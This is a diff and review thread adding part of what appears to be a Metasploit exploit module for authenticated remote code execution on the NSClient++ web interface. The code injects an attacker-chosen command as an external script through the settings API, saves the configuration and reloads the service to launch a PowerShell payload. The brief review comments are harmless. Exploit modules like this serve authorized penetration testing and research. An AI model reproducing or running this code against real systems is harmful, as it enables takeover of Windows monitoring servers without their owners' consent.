modules/exploits/windows/http/nscp_authenticated_rce.rb

```diff
@@ -0,0 +1,228 @@
+        'Targets' =>
+          [
+            [
+              'Windows',
+              {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Type' => :windows_powershell
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-10-20',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'DefaultOptions' => { 'SSL' => true }
+      )
+    )
+
+    register_options [
+      Opt::RPORT(8443),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with on NSClient web interface', nil])
+    ]
+  end
+
+  def generate_random_name
+    (0...rand(8..13)).map { ('a'..'z').to_a[rand(26)] }.join
+  end
+
+  def configure_payload(token, cmd, key)
+    print_status('Configuring Script with Specified Payload . . .')
+
+    node = {
+      'path' => '/settings/external scripts/scripts',
+      'key' => key
+    }
+    value = { 'string_data' => cmd }
+    update = { 'node' => node, 'value' => value }
+    payload = [
+      {
+        'plugin_id' => '1234',
+        'update' => update
+      }
+    ]
+    json_data = { 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    r = send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+
+    if !r.body.to_s.include? 'STATUS_OK'
+      print_error('Error configuring payload. Hit error at: ' + endpoint)
+    end
+
+    print_status('Added External Script (name: ' + key + ')')
+    sleep(3)
+    print_status('Saving Configuration . . .')
+    header = { 'version' => '1' }
+    payload = [ { 'plugin_id' => '1234', 'control' => { 'command' => 'SAVE' } } ]
+    json_data = { 'header' => header, 'type' => 'SettingsRequestMessage', 'payload' => payload }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'data' => JSON.generate(json_data),
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/settings/query.json')
+    })
+  end
+
+  def reload_config(token)
+    print_status('Reloading Application . . .')
+
+    send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'TOKEN' => token },
+      'uri' => normalize_uri('/core/reload')
+    })
+
+    print_status('Waiting for Application to reload . . .')
+    sleep(10)
+    response = false
+    count = 0
+    until response
+      begin
+        r = send_request_cgi({
+          'method' => 'GET',
+          'headers' => { 'TOKEN' => token },
+          'uri' => normalize_uri('/')
+        })
+        if !r.body.empty?
+          response = true
+        end
+      rescue StandardError
+        count += 1
+        if count > 10
+          print_status('Application failed to reload. Nice DoS exploit! /s')
```

Comment:
I appreciate this

Reply:
Fortunately in my case this has never happened to me :)